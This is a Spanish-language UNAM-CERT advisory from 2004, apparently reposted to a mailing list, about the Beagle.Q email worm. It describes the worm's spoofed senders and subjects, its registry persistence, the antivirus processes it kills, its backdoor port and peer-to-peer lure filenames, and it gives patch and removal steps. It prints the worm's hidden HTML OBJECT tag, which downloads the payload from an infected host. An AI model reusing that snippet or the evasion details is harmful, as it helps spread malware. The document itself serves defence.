[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]-----BEGIN PGP SIGNED MESSAGE----- -------------------------------------------------------------------- UNAM-CERT Departamento de Seguridad en Computo DGSCA- UNAM Nota de Seguridad UNAM-CERT 2004-04 Propagación del Virus W32.Beagle.Q y Variantes ---------------------------------------------------------------------- En las últimas horas el CERT/UNAM-CERT ha recibido reportes de nuevo gusano que se propaga de forma masiva a través del correo electrónico. Este gusano conocido como Beagle.Q, explota una vulnerabilidad reciente en el motor de Microsoft Internet Explorer lo cual causa una infección sin la intervención del usuario y sin incluir el ejecutable del virus en el mensaje de correo electrónico. La vulnerabilidad explotada por Beagle.Q esta referenciada en el BoletÃn de Seguridad de *Microsoft MS03-32, Cumulative Patch for Internet Explorer (822925) <http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx>* Fecha de Liberación: 18 de Marzo de 2004 Ultima Revisión: --- Fuente: CERT/CC y diversos reportes de Equipos de Respuesta a Incidentes, asà como Foros y Listas de Discusión y reportes de Usuarios. SISTEMAS AFECTADOS ================== * Windows 2000 * Windows 95 * Windows 98 * Windows Me * Windows NT * Windows 2000 * Windows XP * Windows Server 2003 I. DESCRIPCIÃ?N ============== Beagle.Q conocido también como W32.Bagle.Q [Computer Associates], Bagle.Q [F-Secure], W32/Bagle.q@MM [McAfee], W32/Bagle.Q [Panda], W32/Bagle-Q [Sophos], PE_Bagle.Q [Trend], W32.Beagle.O@mm [Symantec] por los distintos distribuidores antivirus. El gusano utiliza su propio motor SMTP para enviarse por sà mismo a las direcciones de correo encontradas en el sistema. El gusano contiene su propia rutina de codificación MIME y creará el correo en memoria. El correo tiene las siguientes caracterÃsticas: * *Campo From* - Puede ser uno de los siguientes: o management@<dominio del destinatario> o administration@<dominio del destinatario> o staff@<dominio del destinatario> o antivirus@<dominio del destinatario> o antispam@<dominio del destinatario> o noreply@<dominio del destinatario> o support@<dominio del destinatario> * *Campo Subject* - Puede ser uno de los siguientes: o Account notify o E-mail account disabling warning. o E-mail account security warning. o E-mail technical support message. o E-mail technical support warning. o E-mail warning o Email account utilization warning. o Email report o Encrypted document o Fax Message Received o Forum notify o Hidden message o Important notify o Important notify about your e-mail account. o Incoming message o Notify about using the e-mail account. o Notify about your e-mail account utilization. o Notify from e-mail technical support. o Protected message o RE: Protected message o RE: Text message o Re: Document o Re: Hello o Re: Hi o Re: Incoming Fax o Re: Incoming Message o Re: Msg reply o Re: Thank you! o Re: Thanks :) o Re: Yahoo! o Request response o Site changes o Warning about your e-mail account * *Mensaje* Un correo con el virus *Beagle.Q* tendrá la siguiente apariencia en el cuerpo del mensaje: <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://<IP address>:81/373273.php"> </OBJECT></body></html> Utilizando las aplicaciones de correo electrónico vulnerable como por ejemplo Microsoft Outlook and Microsoft Outlook Express, el virus/gusano es descargado vÃa HTTP desde la dirección IP del campo DATA del mensaje HTML. Cabe señalar que el cuerpo del correo es un mensaje en blanco, pero contendrá código HTML semejante al antes mencionado, y descargará y ejecutará automáticamente el gusano utilizando la Vulnerabilidad en nternet Explorer descrita en el Boletin de Seguridad de Microsoft MS03-032. * Cumulative Patch for Internet Explorer (822925) * http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx <http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx> El código intentará descargar el gusano de sistemas infectados (direcciones IP). El gusano inicia un servidor Web en el puerto 81 TCP. Actua como servidor cuando recibe un requerimiento GET particular. El gusano envia una página Web .hta conteniendo un script en VBScript el cual descarga el ejecutable y ejecuta un archivo llamado sm.exe. El método toma ventaja de la vulnerabilidad en Internet Explorer anteriormente mencionada. El gusano no enviará mensajes a las direcciones conteniendo cualquiera de las siguientes cadenas: o @avp. o @foo o @hotmail.com o @iana o @messagelab o @microsoft o @msn o abuse o admin o anyone@ o bsd o bugs@ o cafee o certific o contract@ o f-secur o feste o free-av o gold-certs@ o google o help@ o icrosoft o info@ o kasp o linux o listserv o local o nobody@ o noone@ o noreply o ntivi o panda o pgp o postmaster@ o rating@ o root@ o samples o sopho o spam o support o unix o winrar o winzip * Variantes del Gusano ====================== La versión W32.Beagle.R (Beagle.S y Beagle.T) busca acceder a los sistemas por el puerto 81, a diferencia de su antecesesor W32.Beagle.Q quien lo hace a través del puerto 2556, además, la versión R intenta acceder o infectar a los equipos mediante la búsqueda por IP?s de manera aleatoria y la versión Q lo hace utilizando una dispersión mediante el envÃo de correos electrónicos con ciertas caracterÃsticas como su anterior versión W32.Beagle.K. De igual forma la versión R busca todos los archivos ejecutables en el directorio c:\emails tratándolos de infectar. *Detalles Técnicos* 1. Cuando se ejecuta Beagle.Q y el año del reloj del sistema es 2006 o posterior, el gusano intentará hacer los siguiente: 1. Elimina la llave: HKEY_CURRENT_USER\SOFTWARE\windirects 2. Elimina el valor: "direct.exe"="%System%\direct.exe" de la clave del registro: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Si el valor esta presente, para que Beagle.Q no reinicie cuando se inicie Windows. 3. Detiene su proceso. 2. Beagle.Q se copia a sà mismo en los siguientes archivos: * %System%\directs.exe * %System%\directs.exeopen * %System%\directs.exeopenopen (Cualquier copia del gusano o un archivo .zip o .rar protedigo con contraseña que contiene el gusano.) * %System%\directs.exeopenopenopen (Un archivo .bmp conteniendo una imangen de la contraseña para el archivo .zip o .rar. *Nota: *%System% es una variable. El gusano localiza el directorio de Sistema y se copia por sà mismo a esta localidad. De forma predeterminada, esto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP). 3. Agrega el valor: "directs.exe"="%System%\directs.exee" a la llave del registro: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run para que Beagle.Q se ejecute cuando inicie Windows. 4. Agrega la clave: HKEY_CURRENT_USER\SOFTWARE\windirects 5. Finaliza los siguientes procesos, los cuales son responsables de actualizar las firmas de varios programas antivirus: * AGENTSVR.EXE * ANTI-TROJAN.EXE * ANTIVIRUS.EXE * ANTS.EXE * APIMONITOR.EXE * APLICA32.EXE * APVXDWIN.EXE * ATCON.EXE * ATGUARD.EXE * ATRO55EN.EXE * ATUPDATER.EXE * ATWATCH.EXE * AUPDATE.EXE * AUTODOWN.EXE * AUTOTRACE.EXE * AUTOUPDATE.EXE * AVCONSOL.EXE * AVGSERV9.EXE * AVLTMAIN.EXE * AVPUPD.EXE * AVSYNMGR.EXE * AVWUPD32.EXE * AVXQUAR.EXE * AVprotect9x.exe * Au.exe * BD_PROFESSIONAL.EXE * BIDEF.EXE * BIDSERVER.EXE * BIPCP.EXE * BIPCPEVALSETUP.EXE * BISP.EXE * BLACKD.EXE * BLACKICE.EXE * BOOTWARN.EXE * BORG2.EXE * BS120.EXE * CDP.EXE * CFGWIZ.EXE * CFIADMIN.EXE * CFIAUDIT.EXE * CFINET.EXE * CFINET32.EXE * CLEAN.EXE * CLEANER.EXE * CLEANER3.EXE * CLEANPC.EXE * CMGRDIAN.EXE * CMON016.EXE * CPD.EXE * CPF9X206.EXE * CPFNT206.EXE * CV.EXE * CWNB181.EXE * CWNTDWMO.EXE * D3dupdate.exe * DEFWATCH.EXE * DEPUTY.EXE * DPF.EXE * DPFSETUP.EXE * DRWATSON.EXE * DRWEBUPW.EXE * ENT.EXE * ESCANH95.EXE * ESCANHNT.EXE * ESCANV95.EXE * EXANTIVIRUS-CNET.EXE * FAST.EXE * FIREWALL.EXE * FLOWPROTECTOR.EXE * FP-WIN_TRIAL.EXE * FRW.EXE * FSAV.EXE * FSAV530STBYB.EXE * FSAV530WTBYB.EXE * FSAV95.EXE * GBMENU.EXE * GBPOLL.EXE * GUARD.EXE * GUARDDOG.EXE * HACKTRACERSETUP.EXE * HTLOG.EXE * HWPE.EXE * IAMAPP.EXE * IAMSERV.EXE * ICLOAD95.EXE * ICLOADNT.EXE * ICMON.EXE * ICSSUPPNT.EXE * ICSUPP95.EXE * ICSUPPNT.EXE * IFW2000.EXE * IPARMOR.EXE * IRIS.EXE * JAMMER.EXE * KAVLITE40ENG.EXE * KAVPERS40ENG.EXE * KERIO-PF-213-EN-WIN.EXE * KERIO-WRL-421-EN-WIN.EXE * KERIO-WRP-421-EN-WIN.EXE * KILLPROCESSSETUP161.EXE * LDPRO.EXE * LOCALNET.EXE * LOCKDOWN.EXE * LOCKDOWN2000.EXE * LSETUP.EXE * LUALL.EXE * LUCOMSERVER.EXE * LUINIT.EXE * MCAGENT.EXE * MCUPDATE.EXE * MFW2EN.EXE * MFWENG3.02D30.EXE * MGUI.EXE * MINILOG.EXE * MOOLIVE.EXE * MRFLUX.EXE * MSCONFIG.EXE * MSINFO32.EXE * MSSMMC32.EXE * MU0311AD.EXE * NAV80TRY.EXE * NAVAPW32.EXE * NAVDX.EXE * NAVSTUB.EXE * NAVW32.EXE * NC2000.EXE * NCINST4.EXE * NDD32.EXE * NEOMONITOR.EXE * NETARMOR.EXE * NETINFO.EXE * NETMON.EXE * NETSCANPRO.EXE * NETSPYHUNTER-1.2.EXE * NETSTAT.EXE * NISSERV.EXE * NISUM.EXE * NMAIN.EXE * NORTON_INTERNET_SECU_3.0_407.EXE * NPF40_TW_98_NT_ME_2K.EXE * NPFMESSENGER.EXE * NPROTECT.EXE * NSCHED32.EXE * NTVDM.EXE * NUPGRADE.EXE * NVARCH16.EXE * NWINST4.EXE * NWTOOL16.EXE * OSTRONET.EXE * OUTPOST.EXE * OUTPOSTINSTALL.EXE * OUTPOSTPROINSTALL.EXE * PADMIN.EXE * PANIXK.EXE * PAVPROXY.EXE * PCC2002S902.EXE * PCC2K_76_1436.EXE * PCCIOMON.EXE * PCDSETUP.EXE * PCFWALLICON.EXE * PCIP10117_0.EXE * PDSETUP.EXE * PERISCOPE.EXE * PERSFW.EXE * PF2.EXE * PFWADMIN.EXE * PINGSCAN.EXE * PLATIN.EXE * POPROXY.EXE * POPSCAN.EXE * PORTDETECTIVE.EXE * PPINUPDT.EXE * PPTBC.EXE * PPVSTOP.EXE * PROCEXPLORERV1.0.EXE * PROPORT.EXE * PROTECTX.EXE * PSPF.EXE * PURGE.EXE * PVIEW95.EXE * QCONSOLE.EXE * QSERVER.EXE * RAV8WIN32ENG.EXE * REGEDIT.EXE * REGEDT32.EXE * RESCUE.EXE * RESCUE32.EXE * RRGUARD.EXE * RSHELL.EXE * RTVSCN95.EXE * RULAUNCH.EXE * SAFEWEB.EXE * SBSERV.EXE * SD.EXE * SETUPVAMEEVAL.EXE * SETUP_FLOWPROTECTOR_US.EXE * SFC.EXE * SGSSFW32.EXE * SH.EXE * SHELLSPYINSTALL.EXE * SHN.EXE * SMC.EXE * SOFI.EXE * SPF.EXE * SPHINX.EXE * SPYXX.EXE * SS3EDIT.EXE * ST2.EXE * SUPFTRL.EXE * SUPPORTER5.EXE * SYMPROXYSVC.EXE * SYSEDIT.EXE * TASKMON.EXE * TAUMON.EXE * TAUSCAN.EXE * TC.EXE * TCA.EXE * TCM.EXE * TDS-3.EXE * TDS2-98.EXE * TDS2-NT.EXE * TFAK5.EXE * TGBOB.EXE * TITANIN.EXE * TITANINXP.EXE * TRACERT.EXE * TRJSCAN.EXE * TRJSETUP.EXE * TROJANTRAP3.EXE * UNDOBOOT.EXE * UPDATE.EXE * VBCMSERV.EXE * VBCONS.EXE * VBUST.EXE * VBWIN9X.EXE * VBWINNTW.EXE * VCSETUP.EXE * VFSETUP.EXE * VIRUSMDPERSONALFIREWALL.EXE * VNLAN300.EXE * VNPC3000.EXE * VPC42.EXE * VPFW30S.EXE * VPTRAY.EXE * VSCENU6.02D30.EXE * VSECOMR.EXE * VSHWIN32.EXE * VSISETUP.EXE * VSMAIN.EXE * VSMON.EXE * VSSTAT.EXE * VSWIN9XE.EXE * VSWINNTSE.EXE * VSWINPERSE.EXE * W32DSM89.EXE * W9X.EXE * WATCHDOG.EXE * WEBSCANX.EXE * WGFE95.EXE * WHOSWATCHINGME.EXE * WINRECON.EXE * WNT.EXE * WRADMIN.EXE * WRCTRL.EXE * WSBGATE.EXE * WYVERNWORKSFIREWALL.EXE * XPF202EN.EXE * ZAPRO.EXE * ZAPSETUP3001.EXE * ZATUTOR.EXE * ZAUINST.EXE * ZONALM2601.EXE * ZONEALARM.EXE 6. Borra los siguientes valores * 9XHtProtect * Antivirus * HtProtect * ICQ Net * ICQNet * My AV * NetDy * Special Firewall Service * Tiny AV * Zone Labs Client Ex * service De las claves del registro: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7. Abre una puerta trasera en el puerto 2556 TCP. Si un intruso envÃa un mensaje de datos formateado especialmente al puerto, el gusano permitirá que un archivo arbitrario sea descargado en el directorio %windir%. Este archivo será guardado como %Windir%\iuplda<x>.exe, donde <x> es una cadena aleatoria de caracteres. 8. Intenta propagarse a través de redes de compartición de archivos, como Kazaa e iMesh, W32.Beagle.K se copia a sà mismo a los directorios que contienen la cadena "shar" en sus nombres. El gusano utiliza los nombres de archivos de la siguiente lista: * ACDSee 9.exe * Adobe Photoshop 9 full.exe * Ahead Nero 7.exe * Matrix 3 Revolution English Subtitles.exe * Microsoft Office 2003 Crack, Working!.exe * Microsoft Office XP working Crack, Keygen.exe * Microsoft Windows XP, WinXP Crack, working Keygen.exe * Opera 8 New!.exe * Porno Screensaver.scr * Porno pics arhive, xxx.exe * Porno, sex, oral, anal cool, awesome!!.exe * Serials.txt.exe * WinAmp 5 Pro Keygen Crack Update.exe * WinAmp 6 New!.exe * Windown Longhorn Beta Leak.exe * Windows Sourcecode update.doc.exe * XXX hardcore images.exe 9. Busca en las unidades locales e intenta infectar archivos .exe. La rutina de infección es polimórfica e agrega el gusano al archivo. 10. Escanea los archivos en las unidades locales con las siguientes extensiones: * .adb * .asp * .cfg * .cgi * .dbx * .dhtm * .eml * .htm * .jsp * .mbx * .mdx * .mht * .mmf * .msg * .nch * .ods * .oft * .php * .pl * .sht * .shtm * .stm * .tbb * .txt * .uin * .wab * .wsh * .xls * .xml y colecciona cualquier dirección de correo electrónico que encuentra. III. SOLUCIÃ?N ============= * Aplicar una Actualización del Distribuidor Se recomienda instalar la actualización de seguridad que soluciona la vulnerabilidad que explota este gusano. * Microsoft Security Bulletin MS03-032 Cumulative Patch for Internet Explorer (822925) * http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx <http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx> Pero es recomendable aplicar la última actualización acumulativa para Internet Explorer liberada el 2 de Febrero de 2004: * Microsoft Security Bulletin MS04-004 Cumulative Security Update for Internet Explorer (832894)* http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx <http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx> * Ejecutar, administrar y actualizar un software antivirus Aunque un paquete de software antivirus actualizado no puede brindar protección contra todos los códigos maliciosos, para la mayorÃa de los usuarios representa la primera lÃnea de defensa contra ataques de código malicioso. La mayorÃa de los distribuidores antivirus liberan frecuentemente información actualizada, herramientas, o bases de datos de virus para ayudar a detectar y recuperar un sistema que ha sido infectado mediante un código malicioso, incluyendo Beagle.K. De esta forma, es importante que los usuarios mantengan su software antivirus actualizado. Mucho software antivirus se apoya en las actualizaciones automáticas de las definiciones de virus. El CERT/UNAM-CERT recomienda utilizar estas actualizaciones automáticas cuando estén disponibles. * No ejecutar programas de origen desconocido Nunca descargue, instale o ejecute un programa a menos que sepa que es autorizado por una persona o compañÃa en la que se confÃa. Los usuarios de correo electrónico deben estar concientes de archivos adjuntos inesperados, mientras que los usuarios de Internet Relay Chat (IRC), de la mensajerÃa instantánea (IM), y de servicios de compartición de archivos deben ser muy cuidadosos al dar clic en vÃnculos o links desconocidos o al ejecutar software enviado por otros usuarios debido a que son los métodos más utilizados entre los intrusos para intentar crear redes de agentes DDoS. * Eliminación Manual o Deshabilitar System Restore (Windows Me/XP). + Windows Me 1. Haga clic en Inicio, seleccione Configuración y, a continuación, haga clic en Panel de control. 2. Haga doble clic en Sistema. Se abrirá la ventana de Propiedades del sistema. *Nota:* Si no es visible el Ãcono de Sistema haga clic en "Ver todas las opciones de Panel de control". 3. Haga clic en la pestaña Rendimiento y haga clic en el botón "Archivos de sistema". La ventana de Archivos de sistema se abrirá. 4. Haga clic en Sistema de archivos y, a continuación, haga clic en la pestaña Solución de problemas. 5. Marque la casÃlla de la opción Deshabilitar Restaurar sistema. 6. Haga clic en Aceptar y, por último, en Cerrar. Haga clic en Sà cuando se le pregunte si desea reiniciar Windows. + Windows XP 1. Haga clic en Inicio. 2. Haga clic con el botón secundario en el icono Mi PC y, a continuación, haga clic en Propiedades. 3. Haga clic en la pestaña Restaurar sistema. 4. Marque la casÃlla Desactivar Restaurar sistema o la casÃlla Desactivar Restaurar sistema en todas las unidades. 5. Haga clic en Aplicar y a continuación, en Aceptar. 6. Como verá en el mensaje, esta acción eliminará todos los puntos de restauración existentes. Haga clic en Sà para llevar a cabo esta acción. 7. Haga clic en Aceptar y reinice el sistema. o Actualizar las definiciones de Antivirus. Independientemente del software antivirus que este utilizando, actualice su base de datos de firmas antivirus para poder eliminar el virus Beagle.K. o Eliminar los valores que fueron agregados al registro y reiniciar el equipo. 1. Dar clic en Inicio y después en Ejecuta. 2. Escribir regedit y presionar Aceptar. 3. Buscar la siguiente llave: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4. En el panel de la derecha eliminar el siguiente valor: "directs.exe"="%System%\directs.exe" 5. Salir del editor del registro. 6. Localizar y eliminar los archivos ejecutables directs.exe, directs.exeopen, directs.exeopenopen o directs.exeopenopenopen del directorio (en el caso de que existan): + C:\Windows\System (Win 95/98/ME) + C:\Winnt\System32 (Win NT/2000) + C:\Windows\System32 (Win XP) 7. Reiniciar el equipo. o Analizar el sistema mediante el software antivirus actualizado para eliminar los archivos infectados. APÃ?NDICE A. Referencias ======================= * Virus y Gusanos UNAM-CERT - http://www.unam-cert.unam.mx/gusanos/index.html * Symantec - http://securityresponse.symantec.com/avcenter/venc/data/w32 beagle o en mm html * Trend Micro - http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_BAGLE.Q * Panda Software - http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?IdVirus=45705&sind=0 * Sophos http://www.sophos.com/virusinfo/analyses/w32bagleq.html * Computer Associates - http://www3.ca.com/threatinfo/virusinfo/virus.aspx?id=38599 ------------------------------------------------------------------------ El *Departamento de Seguridad en Cómputo/UNAM-CERT* agradece el apoyo en la elaboración, revisión y traducción de éste boletÃn a: * Jesus Ramón Jiménez Rojas (jrojas en seguridad unam mx) * Omar Landa Alfán (olanda en correo seguridad unam mx) * Sergio Alavez (salavez en seguridad unam mx) * Mauricio Andrade (mandrade en seguridad unam mx) ------------------------------------------------------------------------ INFORMACIÃ?N =========== Este documento se encuentra disponible en: http://www.seguridad.unam.mx http://www.unam-cert.unam.mx/Notas/Notas2004/nota-UNAM-CERT-2004-004.html Para mayor información acerca de éste boletÃn de seguridad contactar a: UNAM CERT Equipo de Respuesta a Incidentes UNAM Departamento de Seguridad en Computo DGSCA - UNAM E-Mail : unam-cert en seguridad unam mx http://www.unam-cert.unam.mx http://www.seguridad.unam.mx ftp://ftp.seguridad.unam.mx Tel : 56 22 81 69 Fax : 56 22 80 43 - -- Juan Carlos Guel Lopez UNAM-CERT Equipo de Respuesta a Incidentes UNAM DGSCA, UNAM E-mail: unam-cert en seguridad unam mx Circuito Exterior, C. U. Tel.: 5622-81-69 Fax: 5622-80-43 Del. Coyoacan WWW: http://www.seguridad.unam.mx 04510 Mexico D. F. WWW: http://www.unam-cert.unam.mx -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQEVAwUBQFoUHnAvLUtwgRsVAQEPqgf/QAsUZJLmXlOKfS0I6lOONV+hWp11Ozw7 GO5BJbwbWMT/e3vkAybvaeZYUxft9lxugpZWzcs6gDlmtUceJqTbiGZ9Xvddg6yu BYa4lJKUKlz1A5SrZgwDzixbePOU7YN2B3/qAKkJ0kbol2FqOkHrwQ3Nt9R89rUy QRkZah/7UI1gduT2B7O1NYqRIeXhWvF8WVh74SpL3Ny6U8gKH/fDtYV8PIGxKT+x i/2FUAhFL/r9TbYa+And5ZQGGppY/D+nFr729319PcyamO1N73dsoMPwAk4t7u8i 8blYZVBytyvyCWj9nNuBAbL7gXmEYsRTqKN55uWjWDoNK2M1SUF0AA== =oCCx -----END PGP SIGNATURE----- Lista de correo linux en opensource org mx Preguntas linux-owner en opensource org mx http://www.opensource.org.mx/